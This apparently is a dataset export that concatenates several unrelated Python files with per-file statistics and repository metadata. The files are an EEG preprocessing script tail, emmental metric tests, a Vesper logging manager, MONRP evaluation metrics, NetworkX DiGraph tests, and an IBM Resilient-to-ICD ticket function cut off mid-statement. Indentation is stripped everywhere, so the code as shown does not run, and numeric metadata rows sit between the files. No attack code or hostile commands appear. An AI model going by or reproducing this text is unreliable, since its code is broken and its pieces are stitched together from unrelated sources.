ch_mapping = {'ar': ar_ch_mapping, 'le': le_ch_mapping}
def select_by_channels(ds, ch_mapping):
split_ids = []
for i, d in enumerate(ds.datasets):
# these are the channels we are looking for
seta = set(ch_mapping[d.description.reference].keys())
# these are the channels of the recoding
setb = set(d.raw.ch_names)
# if recording contains all channels we are looking for, include it
if seta.issubset(setb):
split_ids.append(i)
return ds.split(split_ids)['0']
tuh = select_by_channels(tuh, ch_mapping)
###############################################################################
# Next, we will chain several preprocessing steps that are realized through
# `mne`. Data will be loaded by the first preprocessor that has a mention of it
# in brackets:
#
# #. crop the recordings to a region of interest
# #. re-reference all recordings to 'ar' (requires load)
# #. rename channels to short channel names
# #. pick channels of interest
# #. scale signals to microvolts (requires load)
# #. resample recordings to a common frequency (requires load)
# #. create compute windows
def custom_rename_channels(raw, mapping):
# rename channels which are dependent on referencing:
# le: EEG 01-LE, ar: EEG 01-REF
# mne fails if the mapping contains channels as keys that are not present
# in the raw
reference = raw.ch_names[0].split('-')[-1].lower()
assert reference in ['le', 'ref'], 'unexpected referencing'
reference = 'le' if reference == 'le' else 'ar'
raw.rename_channels(mapping[reference])
def custom_crop(raw, tmin=0.0, tmax=None, include_tmax=True):
# crop recordings to tmin – tmax. can be incomplete if recording
# has lower duration than tmax
# by default mne fails if tmax is bigger than duration
tmax = min((raw.n_times - 1) / raw.info['sfreq'], tmax)
raw.crop(tmin=tmin, tmax=tmax, include_tmax=include_tmax)
tmin = 1 * 60
tmax = 6 * 60
sfreq = 100
preprocessors = [
Preprocessor(custom_crop, tmin=tmin, tmax=tmax, include_tmax=False,
apply_on_array=False),
Preprocessor('set_eeg_reference', ref_channels='average', ch_type='eeg'),
Preprocessor(custom_rename_channels, mapping=ch_mapping,
apply_on_array=False),
Preprocessor('pick_channels', ch_names=short_ch_names, ordered=True),
Preprocessor(lambda x: x * 1e6),
Preprocessor('resample', sfreq=sfreq),
]
###############################################################################
# The preprocessing loop works as follows. For every recording, we apply the
# preprocessors as defined above. Then, we update the description of the rec,
# since we have altered the duration, the reference, and the sampling
# frequency. Afterwards, we store each recording to a unique subdirectory that
# is named corresponding to the rec id. To save memory we delete the raw
# dataset after storing. This gives us the option to try different windowing
# parameters after reloading the data.
OUT_PATH = tempfile.mkdtemp() # plaese insert actual output directory here
tuh_splits = tuh.split([[i] for i in range(len(tuh.datasets))])
for rec_i, tuh_subset in tuh_splits.items():
preprocess(tuh_subset, preprocessors)
# update description of the recording(s)
tuh_subset.set_description({
'sfreq': len(tuh_subset.datasets) * [sfreq],
'reference': len(tuh_subset.datasets) * ['ar'],
'n_samples': [len(d) for d in tuh_subset.datasets],
}, overwrite=True)
# create one directory for every recording
rec_path = os.path.join(OUT_PATH, str(rec_i))
if not os.path.exists(rec_path):
os.makedirs(rec_path)
tuh_subset.save(rec_path)
# save memory by deleting raw recording
del tuh_subset.datasets[0].raw
###############################################################################
# We reload the preprocessed data again in a lazy fashion (`preload=False`).
tuh_loaded = load_concat_dataset(OUT_PATH, preload=False)
###############################################################################
# We generate compute windows. The resulting dataset is now ready to be used
# for model training.
window_size_samples = 1000
window_stride_samples = 1000
# generate compute windows here and store them to disk
tuh_windows = create_fixed_length_windows(
tuh_loaded,
start_offset_samples=0,
stop_offset_samples=None,
window_size_samples=window_size_samples,
window_stride_samples=window_stride_samples,
drop_last_window=False
)
# store the number of windows required for loading later on
tuh_windows.set_description({
"n_windows": [len(d) for d in tuh_windows.datasets]})
| 39.966102
| 195
| 0.653605
| 0
| 0
| 0
| 0
| 377
| 0.031971
| 0
| 0
| 6,991
| 0.59286
|
3bfae0d38025f9ed469b1477352c2cbb4d204cae
| 9,752
|
py
|
Python
|
tests/metrics/test_metrics.py
|
HiromuHota/emmental
|
eb1e29b3406fc0ac301b2d29e06db5e6774eb9f0
|
[
"MIT"
] | null | null | null |
tests/metrics/test_metrics.py
|
HiromuHota/emmental
|
eb1e29b3406fc0ac301b2d29e06db5e6774eb9f0
|
[
"MIT"
] | null | null | null |
tests/metrics/test_metrics.py
|
HiromuHota/emmental
|
eb1e29b3406fc0ac301b2d29e06db5e6774eb9f0
|
[
"MIT"
] | null | null | null |
import logging
import numpy as np
from emmental.metrics.accuracy import accuracy_scorer
from emmental.metrics.accuracy_f1 import accuracy_f1_scorer
from emmental.metrics.fbeta import f1_scorer, fbeta_scorer
from emmental.metrics.matthews_correlation import (
matthews_correlation_coefficient_scorer,
)
from emmental.metrics.mean_squared_error import mean_squared_error_scorer
from emmental.metrics.pearson_correlation import pearson_correlation_scorer
from emmental.metrics.pearson_spearman import pearson_spearman_scorer
from emmental.metrics.precision import precision_scorer
from emmental.metrics.recall import recall_scorer
from emmental.metrics.roc_auc import roc_auc_scorer
from emmental.metrics.spearman_correlation import spearman_correlation_scorer
from tests.utils import isequal
def test_accuracy(caplog):
"""Unit test of accuracy_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
probs = np.array(
[[0.9, 0.1], [0.6, 0.4], [1.0, 0.0], [0.8, 0.2], [0.6, 0.4], [0.05, 0.95]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = accuracy_scorer(golds, None, preds)
assert isequal(metric_dict, {"accuracy": 0.6666666666666666})
metric_dict = accuracy_scorer(golds, probs, None)
assert isequal(metric_dict, {"accuracy": 0.6666666666666666})
metric_dict = accuracy_scorer(golds, probs, preds, topk=2)
assert isequal(metric_dict, {"accuracy@2": 1.0})
metric_dict = accuracy_scorer(gold_probs, None, preds)
assert isequal(metric_dict, {"accuracy": 0.6666666666666666})
metric_dict = accuracy_scorer(gold_probs, probs, preds, topk=2)
assert isequal(metric_dict, {"accuracy@2": 1.0})
metric_dict = accuracy_scorer(golds, None, preds, normalize=False)
assert isequal(metric_dict, {"accuracy": 4})
metric_dict = accuracy_scorer(gold_probs, probs, preds, topk=2, normalize=False)
assert isequal(metric_dict, {"accuracy@2": 6})
def test_precision(caplog):
"""Unit test of precision_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = precision_scorer(golds, None, preds, pos_label=1)
assert isequal(metric_dict, {"precision": 1})
metric_dict = precision_scorer(golds, None, preds, pos_label=0)
assert isequal(metric_dict, {"precision": 0.6})
metric_dict = precision_scorer(gold_probs, None, preds, pos_label=1)
assert isequal(metric_dict, {"precision": 1})
metric_dict = precision_scorer(gold_probs, None, preds, pos_label=0)
assert isequal(metric_dict, {"precision": 0.6})
def test_recall(caplog):
"""Unit test of recall_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = recall_scorer(golds, None, preds, pos_label=1)
assert isequal(metric_dict, {"recall": 0.3333333333333333})
metric_dict = recall_scorer(golds, None, preds, pos_label=0)
assert isequal(metric_dict, {"recall": 1})
metric_dict = recall_scorer(gold_probs, None, preds, pos_label=1)
assert isequal(metric_dict, {"recall": 0.3333333333333333})
metric_dict = recall_scorer(gold_probs, None, preds, pos_label=0)
assert isequal(metric_dict, {"recall": 1})
def test_f1(caplog):
"""Unit test of f1_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = f1_scorer(golds, None, preds, pos_label=1)
assert isequal(metric_dict, {"f1": 0.5})
metric_dict = f1_scorer(golds, None, preds, pos_label=0)
assert isequal(metric_dict, {"f1": 0.7499999999999999})
metric_dict = f1_scorer(gold_probs, None, preds, pos_label=1)
assert isequal(metric_dict, {"f1": 0.5})
metric_dict = f1_scorer(gold_probs, None, preds, pos_label=0)
assert isequal(metric_dict, {"f1": 0.7499999999999999})
def test_fbeta(caplog):
"""Unit test of fbeta_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = fbeta_scorer(golds, None, preds, pos_label=1, beta=2)
assert isequal(metric_dict, {"f2": 0.3846153846153846})
metric_dict = fbeta_scorer(golds, None, preds, pos_label=0, beta=2)
assert isequal(metric_dict, {"f2": 0.8823529411764706})
metric_dict = fbeta_scorer(gold_probs, None, preds, pos_label=1, beta=2)
assert isequal(metric_dict, {"f2": 0.3846153846153846})
metric_dict = fbeta_scorer(gold_probs, None, preds, pos_label=0, beta=2)
assert isequal(metric_dict, {"f2": 0.8823529411764706})
def test_matthews_corrcoef(caplog):
"""Unit test of matthews_correlation_coefficient_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = matthews_correlation_coefficient_scorer(golds, None, preds)
assert isequal(metric_dict, {"matthews_corrcoef": 0.4472135954999579})
def test_mean_squared_error(caplog):
"""Unit test of mean_squared_error_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([3, -0.5, 2, 7])
probs = np.array([2.5, 0.0, 2, 8])
metric_dict = mean_squared_error_scorer(golds, probs, None)
assert isequal(metric_dict, {"mean_squared_error": 0.375})
golds = np.array([[0.5, 1], [-1, 1], [7, -6]])
probs = np.array([[0, 2], [-1, 2], [8, -5]])
metric_dict = mean_squared_error_scorer(golds, probs, None)
assert isequal(metric_dict, {"mean_squared_error": 0.7083333333333334})
def test_pearson_correlation(caplog):
"""Unit test of pearson_correlation_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([1, 0, 1, 0, 1, 0])
probs = np.array([0.8, 0.6, 0.9, 0.7, 0.7, 0.2])
metric_dict = pearson_correlation_scorer(golds, probs, None)
assert isequal(metric_dict, {"pearson_correlation": 0.6764814252025461})
metric_dict = pearson_correlation_scorer(golds, probs, None, return_pvalue=True)
assert isequal(
metric_dict,
{
"pearson_correlation": 0.6764814252025461,
"pearson_pvalue": 0.14006598491201777,
},
)
def test_spearman_correlation(caplog):
"""Unit test of spearman_correlation_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([1, 0, 1, 0, 1, 0])
probs = np.array([0.8, 0.6, 0.9, 0.7, 0.7, 0.2])
metric_dict = spearman_correlation_scorer(golds, probs, None)
assert isequal(metric_dict, {"spearman_correlation": 0.7921180343813395})
metric_dict = spearman_correlation_scorer(golds, probs, None, return_pvalue=True)
assert isequal(
metric_dict,
{
"spearman_correlation": 0.7921180343813395,
"spearman_pvalue": 0.06033056705743058,
},
)
def test_pearson_spearman(caplog):
"""Unit test of pearson_spearman_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([1, 0, 1, 0, 1, 0])
probs = np.array([0.8, 0.6, 0.9, 0.7, 0.7, 0.2])
metric_dict = pearson_spearman_scorer(golds, probs, None)
assert isequal(metric_dict, {"pearson_spearman": 0.7342997297919428})
def test_roc_auc(caplog):
"""Unit test of roc_auc_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([[1], [0], [1], [0], [1], [0]])
gold_probs = np.array(
[[0.4, 0.6], [0.9, 0.1], [0.3, 0.7], [0.8, 0.2], [0.1, 0.9], [0.6, 0.4]]
)
probs = np.array(
[[0.2, 0.8], [0.4, 0.6], [0.1, 0.9], [0.3, 0.7], [0.3, 0.7], [0.8, 0.2]]
)
preds = np.array([[0.8], [0.6], [0.9], [0.7], [0.7], [0.2]])
metric_dict = roc_auc_scorer(golds, probs, None)
assert isequal(metric_dict, {"roc_auc": 0.9444444444444444})
metric_dict = roc_auc_scorer(gold_probs, probs, None)
assert isequal(metric_dict, {"roc_auc": 0.9444444444444444})
metric_dict = roc_auc_scorer(golds, preds, None)
assert isequal(metric_dict, {"roc_auc": 0.9444444444444444})
metric_dict = roc_auc_scorer(gold_probs, preds, None)
assert isequal(metric_dict, {"roc_auc": 0.9444444444444444})
golds = np.array([1, 1, 1, 1, 1, 1])
metric_dict = roc_auc_scorer(golds, probs, None)
assert isequal(metric_dict, {"roc_auc": float("nan")})
def test_accuracy_f1(caplog):
"""Unit test of accuracy_f1_scorer"""
caplog.set_level(logging.INFO)
golds = np.array([0, 1, 0, 1, 0, 1])
gold_probs = np.array(
[[0.6, 0.4], [0.1, 0.9], [0.7, 0.3], [0.2, 0.8], [0.9, 0.1], [0.4, 0.6]]
)
preds = np.array([0, 0, 0, 0, 0, 1])
metric_dict = accuracy_f1_scorer(golds, None, preds)
assert isequal(metric_dict, {"accuracy_f1": 0.5833333333333333})
metric_dict = accuracy_f1_scorer(golds, None, preds, pos_label=1)
assert isequal(metric_dict, {"accuracy_f1": 0.5833333333333333})
metric_dict = accuracy_f1_scorer(golds, None, preds, pos_label=0)
assert isequal(metric_dict, {"accuracy_f1": 0.7083333333333333})
metric_dict = accuracy_f1_scorer(gold_probs, None, preds)
assert isequal(metric_dict, {"accuracy_f1": 0.5833333333333333})
| 31.869281
| 85
| 0.658839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 947
| 0.097108
|
3bfbc45da374cdb7d8360321c18d5a979fdef4e1
| 3,986
|
py
|
Python
|
vesper/command/job_logging_manager.py
|
HaroldMills/NFC
|
356b2234dc3c7d180282a597fa1e039ae79e03c6
|
[
"MIT"
] | null | null | null |
vesper/command/job_logging_manager.py
|
HaroldMills/NFC
|
356b2234dc3c7d180282a597fa1e039ae79e03c6
|
[
"MIT"
] | 1
|
2015-01-12T12:41:29.000Z
|
2015-01-12T12:41:29.000Z
|
vesper/command/job_logging_manager.py
|
HaroldMills/NFC
|
356b2234dc3c7d180282a597fa1e039ae79e03c6
|
[
"MIT"
] | null | null | null |
"""Module containing class `JobLoggingManager`."""
from collections import defaultdict
from logging import FileHandler, Handler
from logging.handlers import QueueHandler, QueueListener
from multiprocessing import Queue
import logging
import vesper.util.logging_utils as logging_utils
import vesper.util.os_utils as os_utils
# TODO: Add record count fields to the `Job` model class, and modify
# the record counts handler to update the fields both while a job is
# running and upon completion.
class _RecordCountsHandler(Handler):
def __init__(self):
super().__init__()
self.record_counts = defaultdict(int)
def emit(self, record):
self.record_counts[record.levelno] += 1
class JobLoggingManager:
"""
Manages logging for a Vesper job.
A `JobLoggingManager` manages logging for the processes of a Vesper job.
Log records can be submitted by any process of a job using any logger
(typically the root logger) configured with the `configure_logger`
static method. A logger so configured writes each log record to a
multiprocessing queue that is read by a thread running in the main
job process, which in turn writes log messages to the job's log file.
"""
@staticmethod
def configure_logger(logger, logging_config):
"""
Configures the specified logger to write log records to this job's
logging queue.
For the `logging_config` argument, the main job process can pass
the `logging_config` attribute of its `JobLoggingManager`. This
information is also passed to the `execute` method of the job's
command as the `logging_config` attribute of the command's
execution context. The information is picklable, so it can be
delivered easily to any additional process started by the main
job process as an argument to the process's target function.
"""
level, queue = logging_config
logger.setLevel(level)
handler = QueueHandler(queue)
logger.addHandler(handler)
def __init__(self, job, level):
self.job = job
self.level = level
# Create queue through which log records can be sent from various
# processes and threads to the logging thread.
self.queue = Queue()
formatter = logging_utils.create_formatter()
# Create handler that writes log messages to the job log file.
os_utils.create_parent_directory(job.log_file_path)
file_handler = FileHandler(job.log_file_path, 'w')
file_handler.setFormatter(formatter)
# We used to create a second handler here, of type StreamHandler,
# which wrote messages to stderr, and add it to the QueueListener
# below, but that is no longer desirable since we now configure
# console output on the root logger in our Django project's
# settings.py file. Adding the second handler here would be
# redundant, causing jobs to output two copies of each log
# message to the console.
self._record_counts_handler = _RecordCountsHandler()
# Create logging listener that will run on its own thread and log
# messages sent to it via the queue.
self._listener = QueueListener(
self.queue, file_handler, self._record_counts_handler)
@property
def logging_config(self):
return (self.level, self.queue)
@property
def record_counts(self):
return dict(self._record_counts_handler.record_counts)
def start_up_logging(self):
self._listener.start()
def shut_down_logging(self):
# Tell logging listener to terminate, and wait for it to do so.
self._listener.stop()
logging.shutdown()
| 34.068376
| 76
| 0.659809
| 3,467
| 0.869794
| 0
| 0
| 1,054
| 0.264425
| 0
| 0
| 2,066
| 0.518314
|
3bfc3d39f5d7c8e9a54f0fc8a5c3d30aa858a4b2
| 4,837
|
py
|
Python
|
evaluation/metrics.py
|
victorperezpiqueras/MONRP
|
f20bbde8895867d37b735dec7a5fd95ee90fadf6
|
[
"MIT"
] | null | null | null |
evaluation/metrics.py
|
victorperezpiqueras/MONRP
|
f20bbde8895867d37b735dec7a5fd95ee90fadf6
|
[
"MIT"
] | 2
|
2021-05-05T14:41:24.000Z
|
2022-01-18T09:08:06.000Z
|
evaluation/metrics.py
|
victorperezpiqueras/MONRP
|
f20bbde8895867d37b735dec7a5fd95ee90fadf6
|
[
"MIT"
] | null | null | null |
import math
from typing import List
import numpy as np
from datasets.Dataset import Dataset
from models.Solution import Solution
def calculate_avgValue(population: List[Solution]) -> float:
avgValue = 0
for ind in population:
avgValue += ind.compute_mono_objective_score()
avgValue /= len(population)
return avgValue
def calculate_bestAvgValue(population: List[Solution]) -> float:
bestAvgValue = 0
for ind in population:
if bestAvgValue < ind.compute_mono_objective_score():
bestAvgValue = ind.compute_mono_objective_score()
return bestAvgValue
def calculate_numSolutions(population: List[Solution]) -> int:
return len(set(population))
def calculate_spacing(population: List[Solution]) -> float:
n = len(population)
N = 2
spacing = 0
mean_objectives = []
objective = 0
for j in range(0, len(population)):
objective += population[j].total_cost
objective /= len(population)
mean_objectives.append(objective)
objective = 0
for j in range(0, len(population)):
objective += population[j].total_satisfaction
objective /= len(population)
mean_objectives.append(objective)
for j in range(0, len(population)):
aux_spacing = 0
for i in range(0, N):
di = mean_objectives[i]
if i == 0:
dij = population[j].total_cost
elif i == 1:
dij = population[j].total_satisfaction
aux = (1 - (abs(dij) / di)) ** 2
aux_spacing += aux
aux_spacing = math.sqrt(aux_spacing)
spacing += aux_spacing
spacing /= (n * N)
return spacing
def calculate_hypervolume(population: List[Solution]) -> float:
objectives_diff = []
aux_max_cost, aux_max_sat = population[0].get_max_cost_satisfactions()
aux_min_cost, aux_min_sat = population[0].get_min_cost_satisfactions()
aux_min = float('inf')
aux_max = 0
for ind in population:
if ind.total_cost < aux_min:
aux_min = ind.total_cost
if ind.total_cost > aux_max:
aux_max = ind.total_cost
aux_max_norm = (aux_max-aux_min_cost)/(aux_max_cost-aux_min_cost)
aux_min_norm = (aux_min-aux_min_cost)/(aux_max_cost-aux_min_cost)
aux_val = aux_max_norm-aux_min_norm
objectives_diff.append(aux_val)
aux_min = float('inf')
aux_max = 0
for ind in population:
if ind.total_satisfaction < aux_min:
aux_min = ind.total_satisfaction
if ind.total_satisfaction > aux_max:
aux_max = ind.total_satisfaction
aux_max_norm = (aux_max-aux_min_sat)/(aux_max_sat-aux_min_sat)
aux_min_norm = (aux_min-aux_min_sat)/(aux_max_sat-aux_min_sat)
aux_val = aux_max_norm-aux_min_norm
objectives_diff.append(aux_val)
hypervolume = 1
for i in range(0, len(objectives_diff)):
hypervolume *= objectives_diff[i]
return hypervolume
def eudis2(v1: float, v2: float) -> float:
return math.dist(v1, v2)
# return distance.euclidean(v1, v2)
def calculate_spread(population: List[Solution], dataset: Dataset) -> float:
MIN_OBJ1 = 0
MIN_OBJ2 = 0
MAX_OBJ1 = np.max(dataset.pbis_satisfaction_scaled)
MAX_OBJ2 = np.max(dataset.pbis_cost_scaled)
df = None
dl = None
davg = None
sum_dist = None
N = len(population)
spread = None
first_solution = population[0]
last_solution = population[len(population) - 1]
first_extreme = [MIN_OBJ1, MIN_OBJ2]
last_extreme = [MAX_OBJ1, MAX_OBJ2]
df = eudis2([first_solution.total_satisfaction,
first_solution.total_cost], first_extreme)
dl = eudis2([last_solution.total_satisfaction,
last_solution.total_cost], last_extreme)
davg = 0
dist_count = 0
for i in range(0, len(population)):
for j in range(0, len(population)):
# avoid distance from a point to itself
if i != j:
dist_count += 1
davg += eudis2([population[i].total_satisfaction, population[i].total_cost],
[population[j].total_satisfaction, population[j].total_cost])
davg /= dist_count
# calculate sumatory(i=1->N-1) |di-davg|
sum_dist = 0
for i in range(0, len(population) - 1):
di = eudis2([population[i].total_satisfaction, population[i].total_cost],
[population[i + 1].total_satisfaction, population[i + 1].total_cost])
sum_dist += abs(di - davg)
# spread formula
spread = (df + dl + sum_dist) / (df + dl + (N - 1) * davg)
return spread
def calculate_mean_bits_per_sol(solutions: List[Solution]) -> float:
genes = 0
n_sols = len(solutions)
for sol in solutions:
genes += np.count_nonzero(sol.selected)
return genes/n_sols
| 30.23125
| 92
| 0.64999
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 140
| 0.028944
|
3bfc6525bf99e8218a93653bc016cb8baae15ea1
| 3,803
|
py
|
Python
|
networkx/classes/tests/test_digraph_historical.py
|
KyleBenson/networkx
|
26ccb4a380ba0e5304d7bbff53eb9859c6e4c93a
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/classes/tests/test_digraph_historical.py
|
KyleBenson/networkx
|
26ccb4a380ba0e5304d7bbff53eb9859c6e4c93a
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/classes/tests/test_digraph_historical.py
|
KyleBenson/networkx
|
26ccb4a380ba0e5304d7bbff53eb9859c6e4c93a
|
[
"BSD-3-Clause"
] | 1
|
2019-01-30T17:57:36.000Z
|
2019-01-30T17:57:36.000Z
|
#!/usr/bin/env python
"""Original NetworkX graph tests"""
from nose.tools import *
import networkx
import networkx as nx
from networkx.testing.utils import *
from historical_tests import HistoricalTests
class TestDiGraphHistorical(HistoricalTests):
def setUp(self):
HistoricalTests.setUp(self)
self.G=nx.DiGraph
def test_in_degree(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted(d for n, d in G.in_degree()),[0, 0, 0, 0, 1, 2, 2])
assert_equal(dict(G.in_degree()),
{'A': 0, 'C': 2, 'B': 1, 'D': 2, 'G': 0, 'K': 0, 'J': 0})
def test_out_degree(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted([v for k,v in G.in_degree()]),
[0, 0, 0, 0, 1, 2, 2])
assert_equal(dict(G.out_degree()),
{'A': 2, 'C': 1, 'B': 2, 'D': 0, 'G': 0, 'K': 0, 'J': 0})
def test_degree_digraph(self):
H=nx.DiGraph()
H.add_edges_from([(1,24),(1,2)])
assert_equal(sorted(d for n, d in H.in_degree([1,24])), [0, 1])
assert_equal(sorted(d for n, d in H.out_degree([1,24])), [0, 2])
assert_equal(sorted(d for n, d in H.degree([1,24])), [1, 2])
def test_neighbors(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted(G.neighbors('C')),['D'])
assert_equal(sorted(G['C']),['D'])
assert_equal(sorted(G.neighbors('A')),['B', 'C'])
assert_raises(nx.NetworkXError,G.neighbors,'j')
assert_raises(nx.NetworkXError,G.neighbors,'j')
def test_successors(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted(G.successors('A')),['B', 'C'])
assert_equal(sorted(G.successors('A')),['B', 'C'])
assert_equal(sorted(G.successors('G')),[])
assert_equal(sorted(G.successors('D')),[])
assert_equal(sorted(G.successors('G')),[])
assert_raises(nx.NetworkXError,G.successors,'j')
assert_raises(nx.NetworkXError,G.successors,'j')
def test_predecessors(self):
G=self.G()
G.add_nodes_from('GJK')
G.add_edges_from([('A', 'B'), ('A', 'C'), ('B', 'D'),
('B', 'C'), ('C', 'D')])
assert_equal(sorted(G.predecessors('C')),['A', 'B'])
assert_equal(sorted(G.predecessors('C')),['A', 'B'])
assert_equal(sorted(G.predecessors('G')),[])
assert_equal(sorted(G.predecessors('A')),[])
assert_equal(sorted(G.predecessors('G')),[])
assert_equal(sorted(G.predecessors('A')),[])
assert_equal(sorted(G.successors('D')),[])
assert_raises(nx.NetworkXError,G.predecessors,'j')
assert_raises(nx.NetworkXError,G.predecessors,'j')
def test_reverse(self):
G=nx.complete_graph(10)
H=G.to_directed()
HR=H.reverse()
assert_true(nx.is_isomorphic(H,HR))
assert_equal(sorted(H.edges()),sorted(HR.edges()))
def test_reverse2(self):
H=nx.DiGraph()
foo=[H.add_edge(u,u+1) for u in range(0,5)]
HR=H.reverse()
for u in range(0,5):
assert_true(HR.has_edge(u+1,u))
def test_reverse3(self):
H=nx.DiGraph()
H.add_nodes_from([1,2,3,4])
HR=H.reverse()
assert_equal(sorted(HR.nodes()),[1, 2, 3, 4])
| 34.889908
| 79
| 0.519853
| 3,596
| 0.945569
| 0
| 0
| 0
| 0
| 0
| 0
| 372
| 0.097818
|
3bfc66ab6394f443698742193984f19425d0486f
| 6,325
|
py
|
Python
|
older/fn_res_to_icd/fn_res_to_icd/components/res_to_icd_function.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 65
|
2017-12-04T13:58:32.000Z
|
2022-03-24T18:33:17.000Z
|
older/fn_res_to_icd/fn_res_to_icd/components/res_to_icd_function.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 48
|
2018-03-02T19:17:14.000Z
|
2022-03-09T22:00:38.000Z
|
older/fn_res_to_icd/fn_res_to_icd/components/res_to_icd_function.py
|
nickpartner-goahead/resilient-community-apps
|
097c0dbefddbd221b31149d82af9809420498134
|
[
"MIT"
] | 95
|
2018-01-11T16:23:39.000Z
|
2022-03-21T11:34:29.000Z
|
# -*- coding: utf-8 -*-
# (c) Copyright IBM Corp. 2019. All Rights Reserved.
# pragma pylint: disable=unused-argument, no-self-use
import logging
import re
import sys
import requests
from bs4 import BeautifulSoup as bsoup
from resilient_circuits import ResilientComponent, function, handler
from resilient_circuits import StatusMessage, FunctionResult, FunctionError
from resilient_lib import ResultPayload, readable_datetime
from resilient_lib.components.resilient_common import validate_fields
# The lowest priority an ICD ticket can have as a default setting for escalation
MIN_PRIORITY_ICD = 4
class FunctionComponent(ResilientComponent):
"""Component that implements Resilient function 'res_to_icd_function"""
def __init__(self, opts):
"""constructor provides access to the configuration options"""
super(FunctionComponent, self).__init__(opts)
self.options = opts.get("fn_res_to_icd", {})
@handler("reload")
def _reload(self, event, opts):
"""Configuration options have changed, save new values"""
self.options = opts.get("fn_res_to_icd", {})
@function("res_to_icd_function")
def _res_to_icd_function_function(self, event, *args, **kwargs):
try:
# taken from config section
icd_email = self.options.get("icd_email")
icd_pass = self.options.get("icd_pass")
icd_priority = self.options.get("icd_priority")
icd_field_severity = self.options.get('icd_field_severity')
icd_url = self.options.get('icd_url')
incident_id = kwargs.get("incident_id")
# Payload and validation
payload = ResultPayload('fn_res_to_icd', **kwargs)
validate_fields(['icd_email','icd_pass','icd_url','icd_field_severity'], self.options)
validate_fields(['incident_id'], kwargs)
#logging
log = logging.getLogger(__name__)
log.info("icd_email: %s", icd_email)
log.info("icd_field_severity: %s", icd_field_severity)
log.info("icd_priority: %s", icd_priority)
log.info("incident_id: %s", incident_id)
log.info("icd_url: %s", icd_url)
# Resilient client and api calls
res_client = self.rest_client()
incident_str = '/incidents/{incident_id}/'.format(incident_id=incident_id)
artifact_str = '/incidents/{incident_id}/artifacts'.format(incident_id=incident_id)
field_severity = {}
if icd_field_severity:
# If api call for custom severity field is not successful, Ticket defaults to minimum priority
try:
fieldsev_str = '/types/{type}/fields/{field}'.format(type='incident', field=icd_field_severity)
field_severity = res_client.get(fieldsev_str)
except:
field_severity['values'] = MIN_PRIORITY_ICD
content = res_client.get(incident_str)
art_content = res_client.get(artifact_str)
# Time and date
timestamp = content['create_date']
timeval = readable_datetime(timestamp, milliseconds=True, rtn_format='%Y-%m-%dT%H:%M:%SZ')
time = "Date and Time: {0}".format(timeval)
#artifact population to icd ticket
details_payload = ''
i = 0
j = 0
if icd_field_severity:
try:
for i in range(0, len(art_content)):
if art_content[i].get('properties', False):
if art_content[i]['properties'][0]['name'] in ('source', 'destination'):
j+=1
details_payload += 'ID: {1} IP Address {2}: {0} \n'.format(art_content[i]['value'], art_content[i]['id'], art_content[i]['properties'][0]['name'].capitalize())
log.info("Artifacts added to ICD ticket: {0}".format(j))
except Exception as artifact_error:
log.error(artifact_error)
log.error("Encountered an error parsing artifacts")
##If you custom field isn't specified, it defaults to min priority
if icd_field_severity:
try:
field_sev = field_severity['values']
except:
field_sev = field_severity['name']
if not field_sev:
field_sev = 1 # number
log.info("field_severity: %s", field_sev)
icd_priority_lookup = [0, 4, 4, 4, 3, 2, 2, 1]
try:
icd_priority = icd_priority_lookup[field_sev]
log.info("icd_priority: %s", field_sev)
except:
log.warning("You have not set a priority, icd priority will be set to min value (4)")
icd_priority = MIN_PRIORITY_ICD
# Params and Desk call
params = {"DESCRIPTION" : time,
"DESCRIPTION_LONGDESCRIPTION" : details_payload,
"REPORTEDBYID" : icd_email,
"logtype" : "CLIENTNOTE",
